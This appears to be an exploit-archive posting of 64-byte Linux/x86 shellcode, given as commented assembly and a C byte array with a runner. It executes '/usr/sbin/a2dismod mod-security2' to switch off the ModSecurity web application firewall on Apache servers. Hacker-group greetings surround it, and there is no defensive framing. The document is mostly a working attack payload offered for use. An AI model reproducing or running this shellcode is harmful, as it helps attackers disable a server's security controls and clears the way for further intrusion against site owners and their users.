# Title :Bugtraq shutdown modsecurity -Linux/x86 shellcode 64 bytes # Author : TrOoN # E-mail : http://www.facebook.com/alexydant ( my new facebook ) # Home : city 617 logt Draria algeria # Web Site : www.1337day.com # Facebook : http://www.facebook.com/alexydant ( my new facebook) # platform : Bugtraq Eng # Type : Shellcode # Tested on : Bugtraq # download link : http://bugtraq-team.com/index.php/en # home : city 617 logts DRARIA algeria ### ## # | >> --------+++=[ kadhafi rabi yarhmek ]=+++-------- << | # | > Ked ans | 1337| Rizky Ariestiyansyah | MOsta_team |Hidden-Pain |admin of dis9 team <| # | > fire_hacker | elite_tr0jen | KinG Of PiraTeS |King Hacker <| # | > phibe optik | Black-ID |Chevrosky Russticsh|Imed Lakamora | # | > Brisco_Dz | malik_pc | T0x!c | security-ray|Šòufäïn Dz| hacker_1420 <| # | > dz-team | password noob °_° | password m9awd tl3eb m3aya pff | Turk hack team <| # | > The_viper |amine madrid| back track | metasploit | vivek | younes| l ansito asmholi :) # | ------------------------------------------------- < | ## # we just begin here # *__asm__( * "xor %eax,%eax \n" * "push %eax \n" * "cdq \n" * "push $0x646f6d73 \n" * "push $0x69643261 \n" * "push $0x2f6e6962 \n" * "push $0x732f7273 \n" * "push $0x752f2f2f \n" * "mov %esp,%ebx \n" * "push $0x32 \n" * "push $0x79746972 \n" * "push $0x75636573 \n" * "push $0x2d646f6d \n" * "mov %esp,%ecx \n" * "xor %edx,%edx \n" * "mov $0xb,%al \n" * "push %edx \n" * "push %ecx \n" * "push %ebx \n" * "mov %esp,%ecx \n" * "mov %esp,%edx \n" * "int $0x80 \n" ); */ char shellcode[]="\x31\xc0\x50\x99\x68\x73\x6d\x6f\x64\x68\x61\x32\x64\x69\x68\x62\x69\x6e\x2f\x68\x73\x72\x2f\x73\x68\x2f\x2f\x2f\x75\x89\xe3\x6a\x32\x68\x72\x69\x74\x79\x68\x73\x65\x63\x75\x68\x6d\x6f\x64\x2d\x89\xe1\x31\xd2\xb0\x0b\x52\x51\x53\x89\xe1\x89\xe2\xcd\x80"; int main() { (*(void(*)())shellcode)(); return 0; } # we just kill now # 1337day.com